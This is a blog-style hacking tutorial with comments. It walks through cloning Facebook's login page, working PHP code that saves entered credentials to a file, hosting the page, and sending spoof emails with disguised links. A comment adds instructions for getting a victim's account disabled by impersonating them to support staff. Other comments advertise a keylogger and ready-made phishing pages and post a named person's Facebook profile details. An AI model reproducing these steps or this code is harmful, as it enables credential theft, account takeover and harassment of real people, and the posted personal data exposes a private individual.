This is a step by step tutorial for face-book accounts.
...ONE...
Go to "www.facebook.com/login.php" and right click on some white space on the page and press "view source code". ALOT of text is gonna appear, copy it all to notepad.
TWO...
Now we need to change a few things in the code. So that the login button sends the info to our file instead of the facebook login. We do that by editing the action of the code. So press ctrl+f and search "action=" without the quotes. you should find this
The big red ring that circles the action= you have to change. You have to change it to 'action="next.php" '. after you have done that, you should change the method (small red circle on the picture) to "get" instead of "post", or else it will not work. Save the document as index.html
THREE...
Now that we changed the action to next.php, we should also make a "next.php". open up notepad again. And write this...
Quote
header("Location: http://www.Facebook.com/login.php ");
$handle = fopen("passwords.txt", "a");
foreach($_GET as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>
Save this as "next.php"
Note: for security you should rename "passwords.txt" to something else.
now make a text file called "passwords.txt" or whatever you renamed the file to in the "next.php", leave this document blank...
FOUR...
Upload the 3 files to a subdomain hosting site. THEY MUST SUPPORT .PHP! i suggest these: 110mb.com, spam.com justfree.com or 007sites.com. When you made an account you should upload the 3 files...
FIVE...
now we would like to send spoof emails out. To do that we should first make an email account. which starts with facebook@. or something that looks alike. like this FACEB0OK@hotmail.com or something like that. You should either use Gmail, Live, or hotmail. or you could get a mail like this "facebook@noreply.com" soemthing like that. but eventually that would cost. When your email is set go to step six...
SIX...
Copy the content of an original Facebook friendship invitation email and paste it into a new mail DONT SENT YET!
remove the hyperlink from this link:http:/www.facebook.com/n/?reqs.php
Mark it and push the Add hyperlink button
Add hyperlink button in the red circle. now write your phisher page url in the hyperlink bar that appears after clicking the button. and click add. The hyperlink should still display http:/www.facebook.com/n/?reqs.php
but lead to your phisher page.. Thats pretty Good Now i believe you are ready to send your spoof emails to everybody you know. and hopefully some of them will fall for it...
Filed Under: hack facebook , Phishing

Click Here To Download Winspy Keylogger
derico · 749 weeks ago
Admin 86p · 749 weeks ago
if u want phising page then you can donwload from following link
phising pages
saurabhink · 736 weeks ago
guest · 736 weeks ago
btw anyone know how can i hack a facebook account having access to the email account, but without resetting the password ?
Admin 86p · 736 weeks ago
guest · 736 weeks ago
Sean · 733 weeks ago
Name: Samsam M Warsame
Facebook ID: 1273347960
Link: http://www.facebook.com/profile.php?id=1273347960
trevour · 733 weeks ago
How To Delete Your Friend,s Facebook Account
This tutorial is education purpose only, once deleted profile can never be recovered.
This is an extreme example of Social Engineering technique, we need following things to do so.
1.Victim’s profile link ( you can get it easily )
2.His/Her Email which he/she uses to sign in
3.His/Her birth date which he/she has used in the profile
4.Make an Email ID on gmail or yahoo with the first name and last name same as on victim’s facebook profile.
go to this link http://www.facebook.com/help/identify.php?show_fo...
•Enter details. In the place of ‘ email address where you can be contacted ‘ enter the fake email u created.
•You will get a email on that ID in which facebook people will ask your problem. Reply to them that you are XYZ( victim’s name ) and you cant access your facebook account. Also you have lost access to your Email Address associated with the account. You dont know what to do now. The hacker is coming online regularly and using your account. If the victim is a girl also write ‘ I am a girl and it poses threat to my social life ‘ and write anything you want that could make them take action.
•After 2-3 days youu will get a reply. They will again ask you that you have access to your associated Email or not? Reply them that you still don’t have access to it. And repeat what all you wrote in first mail.
•Next Day or Same Day you will get an Email that your account is disabled.
aiman · 733 weeks ago
what do you mean for this "Note: for security you should rename "passwords.txt" to something else.
now make a text file called "passwords.txt" or whatever you renamed the file to in the "next.php", leave this document blank..." for the step three
aiman · 733 weeks ago
Admin 86p · 733 weeks ago
if u dnt knw much more abt programming then download this pages and upload it directly on ut ftp account.
phishing pages
rish ivivek · 733 weeks ago
uskhan · 722 weeks ago
hasib_akram@yahoo.com
Hole · 720 weeks ago